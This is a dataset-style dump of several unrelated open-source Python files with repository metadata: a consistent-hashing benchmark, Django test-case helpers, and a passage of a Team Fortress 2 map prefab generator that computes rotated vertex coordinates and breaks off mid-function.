raise NotImplementedError | mit | -5,354,162,971,434,637,000 | 39.636364 | 158 | 0.599126 | false |
ultrabug/uhashring | tests/benchmark.py | 1 | 1073 | # -*- coding: utf-8 -*-
"""This is not part of the test suite.
"""
try:
import ketama
except Exception:
ketama = None
from tempfile import NamedTemporaryFile
from time import time
from uhashring import HashRing
num = 1000000
print("running {} key generation comparison".format(num))
# ketama C binding
if ketama:
with NamedTemporaryFile(prefix="benchmark_") as ketama_config_file:
ketama_config_file.write("127.0.0.1:11211\t600\n")
ketama_config_file.write("127.0.0.1:11212\t400\n")
ketama_config_file.flush()
kt = ketama.Continuum(ketama_config_file.name)
pt = time()
for i in range(num):
key = "myval-{}".format(i)
kt.get_server(key)
print("ketama took {} s".format(time() - pt))
# pure python implementation
ring = HashRing(
nodes={"127.0.0.1:11211": 600, "127.0.0.1:11212": 400},
replicas=4,
vnodes=40,
compat=True,
)
pt = time()
for i in range(num):
key = "myval-{}".format(i)
ring.get_server(key)
print("HashRing took {} s".format(time() - pt))
| bsd-3-clause | -8,145,472,118,921,416,000 | 24.547619 | 71 | 0.629077 | false |
takeyourmeds/takeyourmeds-web | takeyourmeds/utils/test.py | 1 | 1913 | from django.test import TestCase
from django.shortcuts import resolve_url
from django.contrib.auth import get_user_model
User = get_user_model()
class TestCase(TestCase):
def setUp(self):
self.user = self.create_user('testuser')
def assertStatusCode(self, status_code, fn, urlconf, *args, **kwargs):
if kwargs.pop('login', False):
user = kwargs.pop('user', self.user)
self.client.login(email=user.email, password='password')
response = fn(resolve_url(urlconf, *args, **kwargs))
self.assertEqual(
response.status_code,
status_code,
"Got HTTP %d but expected HTTP %d. Response:\n%s" % (
response.status_code,
status_code,
response,
)
)
return response
def assertGET(self, status_code, urlconf, *args, **kwargs):
return self.assertStatusCode(
status_code,
self.client.get,
urlconf,
*args,
**kwargs
)
def assertPOST(self, status_code, data, *args, **kwargs):
return self.assertStatusCode(
status_code, lambda x: self.client.post(x, data), *args, **kwargs
)
def assertRedirectsTo(self, response, urlconf, *args, **kwargs):
status_code = kwargs.pop('status_code', 302)
target_status_code = kwargs.pop('target_status_code', 200)
return self.assertRedirects(
response,
resolve_url(urlconf, *args, **kwargs),
status_code,
target_status_code,
)
def create_user(self, email):
return User.objects.create_user(email, 'password')
class SuperuserTestCase(TestCase):
def setUp(self):
super(SuperuserTestCase, self).setUp()
self.user.is_staff = True
self.user.is_superuser = True
self.user.save()
| mit | -9,170,222,890,915,416,000 | 28.890625 | 77 | 0.58024 | false |
baldengineers/easytf2_mapper | prefabs/diag_wall_egypt.py | 1 | 126557 | import os
import math
def rotatePoint(centerPoint,point,angle):
angle = math.radians(angle)
temp_point = point[0]-centerPoint[0] , point[1]-centerPoint[1]
temp_point = ( temp_point[0]*math.cos(angle)-temp_point[1]*math.sin(angle) , temp_point[0]*math.sin(angle)+temp_point[1]*math.cos(angle))
temp_point = temp_point[0]+centerPoint[0] , temp_point[1]+centerPoint[1]
return temp_point
def createTile(posx, posy, id_num, world_id_num, entity_num, placeholder_list, rotation, level):
looplist = '1'
values=[]#Values are all of the lines of a prefab that have the vertex coords
f = open('prefab_template/diag_wall_egypt.txt', 'r+')
lines = f.readlines() #gathers each line of the prefab and puts numbers them
if rotation == 0:
x1 = posx*1*512
y1 = posy*-1*512
z1 = level*448 + 64
x2 = posx*1*512 + (512)
y2 = posy*-1*512
z2 = level*448 + 64
x3 = posx*1*512 + (512)
y3 = posy*-1*512 + (-512)
z3 = level*448 + 64
x4 = posx*1*512
y4 = posy*-1*512 + (-512)
z4 = level*448 + 0
x5 = posx*1*512 + (512)
y5 = posy*-1*512 + (-512)
z5 = level*448 + 0
x6 = posx*1*512 + (512)
y6 = posy*-1*512
z6 = level*448 + 0
x7 = posx*1*512
y7 = posy*-1*512
z7 = level*448 + 64
x8 = posx*1*512
y8 = posy*-1*512 + (-512)
z8 = level*448 + 64
x9 = posx*1*512
y9 = posy*-1*512 + (-512)
z9 = level*448 + 0
x10 = posx*1*512 + (512)
y10 = posy*-1*512
z10 = level*448 + 0
x11 = posx*1*512 + (512)
y11 = posy*-1*512 + (-512)
z11 = level*448 + 0
x12 = posx*1*512 + (512)
y12 = posy*-1*512 + (-512)
z12 = level*448 + 64
x13 = posx*1*512 + (512)
y13 = posy*-1*512
z13 = level*448 + 64
x14 = posx*1*512
y14 = posy*-1*512
z14 = level*448 + 64
x15 = posx*1*512
y15 = posy*-1*512
z15 = level*448 + 0
x16 = posx*1*512 + (512)
y16 = posy*-1*512 + (-512)
z16 = level*448 + 0
x17 = posx*1*512
y17 = posy*-1*512 + (-512)
z17 = level*448 + 0
x18 = posx*1*512
y18 = posy*-1*512 + (-512)
z18 = level*448 + 64
x19 = posx*1*512 + (346)
y19 = posy*-1*512 + (-293)
z19 = level*448 + 64
x20 = posx*1*512 + (512)
y20 = posy*-1*512 + (-458)
z20 = level*448 + 64
x21 = posx*1*512 + (512)
y21 = posy*-1*512 + (-458)
z21 = level*448 + 309
x22 = posx*1*512 + (458)
y22 = posy*-1*512 + (-512)
z22 = level*448 + 64
x23 = posx*1*512 + (293)
y23 = posy*-1*512 + (-346)
z23 = level*448 + 64
x24 = posx*1*512 + (293)
y24 = posy*-1*512 + (-346)
z24 = level*448 + 309
x25 = posx*1*512 + (458)
y25 = posy*-1*512 + (-512)
z25 = level*448 + 309
x26 = posx*1*512 + (293)
y26 = posy*-1*512 + (-346)
z26 = level*448 + 309
x27 = posx*1*512 + (346)
y27 = posy*-1*512 + (-293)
z27 = level*448 + 309
x28 = posx*1*512 + (512)
y28 = posy*-1*512 + (-458)
z28 = level*448 + 64
x29 = posx*1*512 + (346)
y29 = posy*-1*512 + (-293)
z29 = level*448 + 64
x30 = posx*1*512 + (293)
y30 = posy*-1*512 + (-346)
z30 = level*448 + 64
x31 = posx*1*512 + (512)
y31 = posy*-1*512 + (-512)
z31 = level*448 + 64
x32 = posx*1*512 + (458)
y32 = posy*-1*512 + (-512)
z32 = level*448 + 64
x33 = posx*1*512 + (458)
y33 = posy*-1*512 + (-512)
z33 = level*448 + 309
x34 = posx*1*512 + (512)
y34 = posy*-1*512 + (-458)
z34 = level*448 + 309
x35 = posx*1*512 + (512)
y35 = posy*-1*512 + (-458)
z35 = level*448 + 64
x36 = posx*1*512 + (512)
y36 = posy*-1*512 + (-512)
z36 = level*448 + 64
x37 = posx*1*512 + (293)
y37 = posy*-1*512 + (-346)
z37 = level*448 + 309
x38 = posx*1*512 + (293)
y38 = posy*-1*512 + (-346)
z38 = level*448 + 64
x39 = posx*1*512 + (346)
y39 = posy*-1*512 + (-293)
z39 = level*448 + 64
x40 = posx*1*512 + (228)
y40 = posy*-1*512 + (-160)
z40 = level*448 + 64
x41 = posx*1*512 + (352)
y41 = posy*-1*512 + (-286)
z41 = level*448 + 64
x42 = posx*1*512 + (352)
y42 = posy*-1*512 + (-286)
z42 = level*448 + 320
x43 = posx*1*512 + (283)
y43 = posy*-1*512 + (-356)
z43 = level*448 + 64
x44 = posx*1*512 + (160)
y44 = posy*-1*512 + (-230)
z44 = level*448 + 64
x45 = posx*1*512 + (160)
y45 = posy*-1*512 + (-230)
z45 = level*448 + 320
x46 = posx*1*512 + (283)
y46 = posy*-1*512 + (-356)
z46 = level*448 + 320
x47 = posx*1*512 + (160)
y47 = posy*-1*512 + (-230)
z47 = level*448 + 320
x48 = posx*1*512 + (228)
y48 = posy*-1*512 + (-160)
z48 = level*448 + 320
x49 = posx*1*512 + (160)
y49 = posy*-1*512 + (-230)
z49 = level*448 + 64
x50 = posx*1*512 + (283)
y50 = posy*-1*512 + (-356)
z50 = level*448 + 64
x51 = posx*1*512 + (352)
y51 = posy*-1*512 + (-286)
z51 = level*448 + 64
x52 = posx*1*512 + (160)
y52 = posy*-1*512 + (-230)
z52 = level*448 + 320
x53 = posx*1*512 + (160)
y53 = posy*-1*512 + (-230)
z53 = level*448 + 64
x54 = posx*1*512 + (228)
y54 = posy*-1*512 + (-160)
z54 = level*448 + 64
x55 = posx*1*512 + (352)
y55 = posy*-1*512 + (-286)
z55 = level*448 + 320
x56 = posx*1*512 + (352)
y56 = posy*-1*512 + (-286)
z56 = level*448 + 64
x57 = posx*1*512 + (283)
y57 = posy*-1*512 + (-356)
z57 = level*448 + 64
x58 = posx*1*512 + (192)
y58 = posy*-1*512 + (-138)
z58 = level*448 + 309
x59 = posx*1*512 + (192)
y59 = posy*-1*512 + (-138)
z59 = level*448 + 64
x60 = posx*1*512 + (250)
y60 = posy*-1*512 + (-197)
z60 = level*448 + 64
x61 = posx*1*512 + (197)
y61 = posy*-1*512 + (-250)
z61 = level*448 + 64
x62 = posx*1*512 + (192)
y62 = posy*-1*512 + (-245)
z62 = level*448 + 64
x63 = posx*1*512 + (192)
y63 = posy*-1*512 + (-245)
z63 = level*448 + 309
x64 = posx*1*512 + (192)
y64 = posy*-1*512 + (-245)
z64 = level*448 + 309
x65 = posx*1*512 + (192)
y65 = posy*-1*512 + (-245)
z65 = level*448 + 64
x66 = posx*1*512 + (192)
y66 = posy*-1*512 + (-138)
z66 = level*448 + 64
x67 = posx*1*512 + (197)
y67 = posy*-1*512 + (-250)
z67 = level*448 + 309
x68 = posx*1*512 + (192)
y68 = posy*-1*512 + (-245)
z68 = level*448 + 309
x69 = posx*1*512 + (192)
y69 = posy*-1*512 + (-138)
z69 = level*448 + 309
x70 = posx*1*512 + (250)
y70 = posy*-1*512 + (-197)
z70 = level*448 + 64
x71 = posx*1*512 + (192)
y71 = posy*-1*512 + (-138)
z71 = level*448 + 64
x72 = posx*1*512 + (192)
y72 = posy*-1*512 + (-245)
z72 = level*448 + 64
x73 = posx*1*512 + (250)
y73 = posy*-1*512 + (-197)
z73 = level*448 + 309
x74 = posx*1*512 + (250)
y74 = posy*-1*512 + (-197)
z74 = level*448 + 64
x75 = posx*1*512 + (197)
y75 = posy*-1*512 + (-250)
z75 = level*448 + 64
x76 = posx*1*512 + (192)
y76 = posy*-1*512 + (-245)
z76 = level*448 + 309
x77 = posx*1*512 + (192)
y77 = posy*-1*512 + (-245)
z77 = level*448 + 64
x78 = posx*1*512 + (138)
y78 = posy*-1*512 + (-192)
z78 = level*448 + 64
x79 = posx*1*512 + (192)
y79 = posy*-1*512 + (-192)
z79 = level*448 + 64
x80 = posx*1*512 + (192)
y80 = posy*-1*512 + (-245)
z80 = level*448 + 64
x81 = posx*1*512 + (192)
y81 = posy*-1*512 + (-245)
z81 = level*448 + 309
x82 = posx*1*512 + (192)
y82 = posy*-1*512 + (-245)
z82 = level*448 + 309
x83 = posx*1*512 + (138)
y83 = posy*-1*512 + (-192)
z83 = level*448 + 309
x84 = posx*1*512 + (192)
y84 = posy*-1*512 + (-192)
z84 = level*448 + 309
x85 = posx*1*512 + (138)
y85 = posy*-1*512 + (-192)
z85 = level*448 + 64
x86 = posx*1*512 + (192)
y86 = posy*-1*512 + (-245)
z86 = level*448 + 64
x87 = posx*1*512 + (192)
y87 = posy*-1*512 + (-192)
z87 = level*448 + 64
x88 = posx*1*512 + (138)
y88 = posy*-1*512 + (-192)
z88 = level*448 + 309
x89 = posx*1*512 + (138)
y89 = posy*-1*512 + (-192)
z89 = level*448 + 64
x90 = posx*1*512 + (192)
y90 = posy*-1*512 + (-192)
z90 = level*448 + 64
x91 = posx*1*512 + (128)
y91 = posy*-1*512 + (-74)
z91 = level*448 + 64
x92 = posx*1*512 + (192)
y92 = posy*-1*512 + (-138)
z92 = level*448 + 64
x93 = posx*1*512 + (192)
y93 = posy*-1*512 + (-138)
z93 = level*448 + 309
x94 = posx*1*512 + (138)
y94 = posy*-1*512 + (-192)
z94 = level*448 + 309
x95 = posx*1*512 + (138)
y95 = posy*-1*512 + (-192)
z95 = level*448 + 64
x96 = posx*1*512 + (128)
y96 = posy*-1*512 + (-181)
z96 = level*448 + 64
x97 = posx*1*512 + (192)
y97 = posy*-1*512 + (-138)
z97 = level*448 + 309
x98 = posx*1*512 + (192)
y98 = posy*-1*512 + (-138)
z98 = level*448 + 64
x99 = posx*1*512 + (192)
y99 = posy*-1*512 + (-192)
z99 = level*448 + 64
x100 = posx*1*512 + (192)
y100 = posy*-1*512 + (-192)
z100 = level*448 + 309
x101 = posx*1*512 + (192)
y101 = posy*-1*512 + (-192)
z101 = level*448 + 64
x102 = posx*1*512 + (138)
y102 = posy*-1*512 + (-192)
z102 = level*448 + 64
x103 = posx*1*512 + (138)
y103 = posy*-1*512 + (-192)
z103 = level*448 + 309
x104 = posx*1*512 + (128)
y104 = posy*-1*512 + (-181)
z104 = level*448 + 309
x105 = posx*1*512 + (128)
y105 = posy*-1*512 + (-74)
z105 = level*448 + 309
x106 = posx*1*512 + (192)
y106 = posy*-1*512 + (-138)
z106 = level*448 + 64
x107 = posx*1*512 + (128)
y107 = posy*-1*512 + (-74)
z107 = level*448 + 64
x108 = posx*1*512 + (128)
y108 = posy*-1*512 + (-181)
z108 = level*448 + 64
x109 = posx*1*512 + (128)
y109 = posy*-1*512 + (-181)
z109 = level*448 + 309
x110 = posx*1*512 + (128)
y110 = posy*-1*512 + (-181)
z110 = level*448 + 64
x111 = posx*1*512 + (128)
y111 = posy*-1*512 + (-74)
z111 = level*448 + 64
x112 = posx*1*512 + (53)
y112 = posy*-1*512
z112 = level*448 + 64
x113 = posx*1*512 + (128)
y113 = posy*-1*512 + (-74)
z113 = level*448 + 64
x114 = posx*1*512 + (128)
y114 = posy*-1*512 + (-74)
z114 = level*448 + 309
x115 = posx*1*512 + (128)
y115 = posy*-1*512 + (-181)
z115 = level*448 + 64
x116 = posx*1*512
y116 = posy*-1*512 + (-53)
z116 = level*448 + 64
x117 = posx*1*512
y117 = posy*-1*512 + (-53)
z117 = level*448 + 309
x118 = posx*1*512
y118 = posy*-1*512 + (-53)
z118 = level*448 + 309
x119 = posx*1*512
y119 = posy*-1*512 + (-53)
z119 = level*448 + 64
x120 = posx*1*512
y120 = posy*-1*512
z120 = level*448 + 64
x121 = posx*1*512 + (128)
y121 = posy*-1*512 + (-181)
z121 = level*448 + 309
x122 = posx*1*512
y122 = posy*-1*512 + (-53)
z122 = level*448 + 309
x123 = posx*1*512
y123 = posy*-1*512
z123 = level*448 + 309
x124 = posx*1*512 + (128)
y124 = posy*-1*512 + (-74)
z124 = level*448 + 64
x125 = posx*1*512 + (53)
y125 = posy*-1*512
z125 = level*448 + 64
x126 = posx*1*512
y126 = posy*-1*512
z126 = level*448 + 64
x127 = posx*1*512 + (128)
y127 = posy*-1*512 + (-74)
z127 = level*448 + 309
x128 = posx*1*512 + (128)
y128 = posy*-1*512 + (-74)
z128 = level*448 + 64
x129 = posx*1*512 + (128)
y129 = posy*-1*512 + (-181)
z129 = level*448 + 64
x130 = posx*1*512
y130 = posy*-1*512
z130 = level*448 + 309
x131 = posx*1*512
y131 = posy*-1*512
z131 = level*448 + 64
x132 = posx*1*512 + (53)
y132 = posy*-1*512
z132 = level*448 + 64
#INSERT_ROT_0_PY_LIST
elif rotation == 1:
x1 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 270)[0])
y1 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 270)[1])
z1 = level*448 + 64
x2 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512), 270)[0])
y2 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512), 270)[1])
z2 = level*448 + 64
x3 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-512)), 270)[0])
y3 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-512)), 270)[1])
z3 = level*448 + 64
x4 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-512)), 270)[0])
y4 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-512)), 270)[1])
z4 = level*448 + 0
x5 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-512)), 270)[0])
y5 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-512)), 270)[1])
z5 = level*448 + 0
x6 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512), 270)[0])
y6 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512), 270)[1])
z6 = level*448 + 0
x7 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 270)[0])
y7 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 270)[1])
z7 = level*448 + 64
x8 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-512)), 270)[0])
y8 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-512)), 270)[1])
z8 = level*448 + 64
x9 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-512)), 270)[0])
y9 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-512)), 270)[1])
z9 = level*448 + 0
x10 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512), 270)[0])
y10 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512), 270)[1])
z10 = level*448 + 0
x11 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-512)), 270)[0])
y11 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-512)), 270)[1])
z11 = level*448 + 0
x12 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-512)), 270)[0])
y12 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-512)), 270)[1])
z12 = level*448 + 64
x13 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512), 270)[0])
y13 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512), 270)[1])
z13 = level*448 + 64
x14 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 270)[0])
y14 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 270)[1])
z14 = level*448 + 64
x15 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 270)[0])
y15 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 270)[1])
z15 = level*448 + 0
x16 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-512)), 270)[0])
y16 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-512)), 270)[1])
z16 = level*448 + 0
x17 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-512)), 270)[0])
y17 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-512)), 270)[1])
z17 = level*448 + 0
x18 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-512)), 270)[0])
y18 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-512)), 270)[1])
z18 = level*448 + 64
x19 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (346), posy*-1*512 + (-293)), 270)[0])
y19 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (346), posy*-1*512 + (-293)), 270)[1])
z19 = level*448 + 64
x20 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-458)), 270)[0])
y20 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-458)), 270)[1])
z20 = level*448 + 64
x21 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-458)), 270)[0])
y21 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-458)), 270)[1])
z21 = level*448 + 309
x22 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (458), posy*-1*512 + (-512)), 270)[0])
y22 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (458), posy*-1*512 + (-512)), 270)[1])
z22 = level*448 + 64
x23 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (293), posy*-1*512 + (-346)), 270)[0])
y23 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (293), posy*-1*512 + (-346)), 270)[1])
z23 = level*448 + 64
x24 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (293), posy*-1*512 + (-346)), 270)[0])
y24 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (293), posy*-1*512 + (-346)), 270)[1])
z24 = level*448 + 309
x25 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (458), posy*-1*512 + (-512)), 270)[0])
y25 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (458), posy*-1*512 + (-512)), 270)[1])
z25 = level*448 + 309
x26 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (293), posy*-1*512 + (-346)), 270)[0])
y26 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (293), posy*-1*512 + (-346)), 270)[1])
z26 = level*448 + 309
x27 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (346), posy*-1*512 + (-293)), 270)[0])
y27 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (346), posy*-1*512 + (-293)), 270)[1])
z27 = level*448 + 309
x28 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-458)), 270)[0])
y28 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-458)), 270)[1])
z28 = level*448 + 64
x29 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (346), posy*-1*512 + (-293)), 270)[0])
y29 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (346), posy*-1*512 + (-293)), 270)[1])
z29 = level*448 + 64
x30 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (293), posy*-1*512 + (-346)), 270)[0])
y30 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (293), posy*-1*512 + (-346)), 270)[1])
z30 = level*448 + 64
x31 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-512)), 270)[0])
y31 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-512)), 270)[1])
z31 = level*448 + 64
x32 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (458), posy*-1*512 + (-512)), 270)[0])
y32 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (458), posy*-1*512 + (-512)), 270)[1])
z32 = level*448 + 64
x33 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (458), posy*-1*512 + (-512)), 270)[0])
y33 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (458), posy*-1*512 + (-512)), 270)[1])
z33 = level*448 + 309
x34 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-458)), 270)[0])
y34 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-458)), 270)[1])
z34 = level*448 + 309
x35 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-458)), 270)[0])
y35 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-458)), 270)[1])
z35 = level*448 + 64
x36 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-512)), 270)[0])
y36 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-512)), 270)[1])
z36 = level*448 + 64
x37 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (293), posy*-1*512 + (-346)), 270)[0])
y37 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (293), posy*-1*512 + (-346)), 270)[1])
z37 = level*448 + 309
x38 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (293), posy*-1*512 + (-346)), 270)[0])
y38 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (293), posy*-1*512 + (-346)), 270)[1])
z38 = level*448 + 64
x39 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (346), posy*-1*512 + (-293)), 270)[0])
y39 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (346), posy*-1*512 + (-293)), 270)[1])
z39 = level*448 + 64
x40 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (228), posy*-1*512 + (-160)), 270)[0])
y40 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (228), posy*-1*512 + (-160)), 270)[1])
z40 = level*448 + 64
x41 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (352), posy*-1*512 + (-286)), 270)[0])
y41 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (352), posy*-1*512 + (-286)), 270)[1])
z41 = level*448 + 64
x42 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (352), posy*-1*512 + (-286)), 270)[0])
y42 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (352), posy*-1*512 + (-286)), 270)[1])
z42 = level*448 + 320
x43 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (283), posy*-1*512 + (-356)), 270)[0])
y43 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (283), posy*-1*512 + (-356)), 270)[1])
z43 = level*448 + 64
x44 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (160), posy*-1*512 + (-230)), 270)[0])
y44 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (160), posy*-1*512 + (-230)), 270)[1])
z44 = level*448 + 64
x45 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (160), posy*-1*512 + (-230)), 270)[0])
y45 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (160), posy*-1*512 + (-230)), 270)[1])
z45 = level*448 + 320
x46 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (283), posy*-1*512 + (-356)), 270)[0])
y46 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (283), posy*-1*512 + (-356)), 270)[1])
z46 = level*448 + 320
x47 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (160), posy*-1*512 + (-230)), 270)[0])
y47 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (160), posy*-1*512 + (-230)), 270)[1])
z47 = level*448 + 320
x48 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (228), posy*-1*512 + (-160)), 270)[0])
y48 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (228), posy*-1*512 + (-160)), 270)[1])
z48 = level*448 + 320
x49 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (160), posy*-1*512 + (-230)), 270)[0])
y49 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (160), posy*-1*512 + (-230)), 270)[1])
z49 = level*448 + 64
x50 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (283), posy*-1*512 + (-356)), 270)[0])
y50 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (283), posy*-1*512 + (-356)), 270)[1])
z50 = level*448 + 64
x51 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (352), posy*-1*512 + (-286)), 270)[0])
y51 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (352), posy*-1*512 + (-286)), 270)[1])
z51 = level*448 + 64
x52 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (160), posy*-1*512 + (-230)), 270)[0])
y52 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (160), posy*-1*512 + (-230)), 270)[1])
z52 = level*448 + 320
x53 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (160), posy*-1*512 + (-230)), 270)[0])
y53 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (160), posy*-1*512 + (-230)), 270)[1])
z53 = level*448 + 64
x54 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (228), posy*-1*512 + (-160)), 270)[0])
y54 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (228), posy*-1*512 + (-160)), 270)[1])
z54 = level*448 + 64
x55 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (352), posy*-1*512 + (-286)), 270)[0])
y55 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (352), posy*-1*512 + (-286)), 270)[1])
z55 = level*448 + 320
